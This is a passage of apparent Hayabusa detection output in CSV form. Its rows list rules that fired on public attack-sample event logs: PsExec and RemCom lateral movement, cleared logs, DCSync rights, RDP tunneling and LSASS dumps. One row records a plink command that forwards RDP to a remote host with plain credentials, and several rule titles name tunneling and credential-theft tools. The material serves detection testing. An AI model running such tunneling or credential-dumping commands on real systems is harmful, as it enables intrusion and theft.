PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:25:48.647 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx +2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: blabla.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: blabla.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.540 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-20 16:00:50.800 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx +2019-01-20 16:29:57.863 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx +2019-02-02 18:16:52.479 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: helpdesk : Workstation evil.internal.corp : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:22.562 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: EXCHANGE$ : Workstation EXCHANGE : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,informational,Logon Type 3 - Network,User: EXCHANGE$ : Workstation: EXCHANGE : IP Address: 192.168.111.87 : Port: 58128 : LogonID: 0x24daa6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-14 00:15:04.175 +09:00,PC02.example.corp,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:15:08.689 +09:00,PC02.example.corp,4624,low,Logon Type 5 - Service,User: sshd_server : Workstation: PC02 : IP Address: - : Port: - : LogonID: 0xe509,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:19:51.259 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x21f73 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 49164 : LogonID: 0x45120 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:29:40.657 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4a26d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:31:19.529 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49168 : LogonID: 0x73d02,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:31:31.556 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49169 : LogonID: 0x7d4f4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 03:01:41.593 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: admin01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4624,informational,Logon Type 11 - CachedInteractive,User: user01 : Workstation: PC01 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1414c8 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: user01 : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: user01 : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4624,informational,Logon Type 7 - Unlock,User: user01 : Workstation: PC01 : IP Address: - : Port: - : LogonID: 0x1414d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:43.171 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x14871d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:57.442 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x148f5d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: admin01 : Workstation: PC01 : IP Address: 127.0.0.1 : Port: 49274 : LogonID: 0x14a321 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x14a321,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: admin01 : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,low,Admin User Remote Logon,,rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test : Path: C:\Users\IEUser\Desktop\plink.exe : User: PC01\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,high,Suspicious Plink Remote Forwarding,,rules/sigma/process_creation/sysmon_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,medium,Exfiltration and Tunneling Tools Execution,,rules/sigma/process_creation/win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:03:48.058 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: PC01\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.141 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.151 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.351 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.962 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.283 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.563 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\TSTheme.exe -Embedding : Path: C:\Windows\System32\TSTheme.exe : User: PC01\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:26.499 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: PC01\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:38.843 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.522 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File 